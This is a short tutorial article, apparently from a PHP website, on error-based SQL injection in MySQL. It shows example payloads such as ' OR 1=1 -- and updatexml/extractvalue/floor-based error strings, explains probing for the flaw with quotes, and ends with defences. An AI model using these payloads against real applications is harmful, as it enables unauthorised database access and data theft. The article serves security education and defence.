Error-Based SQL injection triggers a database error by constructing inputs, thereby obtaining sensitive data from error messages. The attacker uses unfiltered or escaped user input to induce the application to expose the database structure or content. Common ways include using updatexml(), extractvalue(), floor() and other functions to trigger errors and "hijack" information. The detection method is to add quotes to the parameters to observe whether SQL syntax errors are returned. Defense measures include using parameterized queries, filtering escape inputs, closing detailed error prompts, and deploying a web application firewall.

When encountering SQL error injection problems, in many cases, it is caused by the user input not being filtered or escaped. This type of attack uses the information returned by the database when an error occurs to obtain sensitive data and even control the database. Although not recommended for malicious operations, understanding its principles and prevention methods is important for development and security personnel.

What is Error-Based SQL Injection

Simply put, Error-Based SQL injection is an attacker who constructs special inputs to make the application trigger database errors and obtains useful data from the error message, such as table names, column names and even database versions.

For example: If you type ' OR 1=1 -- in the login box, and the system does not do any filtering, it may trigger a syntax error, which exposes the database type or structure. This information leakage is the first step in the attack.

Common error injection methods

There are many ways to inject errors. The common one is to use several function features of MySQL, such as updatexml() , extractvalue() , floor() , etc. They will throw error messages when used improperly, and these messages can be "hijacked" by the injection statement.

Here are some typical examples:

• Using updatexml(1, concat('~', (select database()), '~'), 1) will trigger an error and display the current database name.
• The way to use extractvalue() is similar, but the syntax is slightly different.
• floor(rand(0)*2) can create duplicate key errors with group by , thereby exposing the subquery results.

The core idea of these methods is to make the database "spray" information that should not have been seen by users.

How to detect whether there is an error injection vulnerability

To determine whether an interface has an error injection point, it is usually done to add single quotes ' or double quotes " after the parameter to see if the database error message is returned.

If something like the following is returned:

 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

This can basically determine that there is a possibility of error injection in this interface.

You can also further try to splice some error-reporting functions to see if they can successfully return the internal information of the database.

How to defend against Error-Based injection

The key to defense is to prevent user input from being spliced directly into SQL statements . There are several commonly used methods:

• Use parameterized queries (Prepared Statements)
  This is the most recommended way to pass user input as parameters instead of splicing strings.

• Filter and escape the input
  For example, remove special characters, or use the escape function that comes with the framework.

• Close detailed error prompt
  Do not enable detailed database error output in production environments to avoid leakage of sensitive information.

• Using Web Application Firewall (WAF)
  For example, ModSecurity can identify common injection patterns and intercept them.

Basically that's it. Although the injection of errors seems to be a bit technical, as long as the input is done well, this type of risk can be completely avoided.

The above is the detailed content of SQL Error-Based Injection Methods. For more information, please follow other related articles on the PHP Chinese website!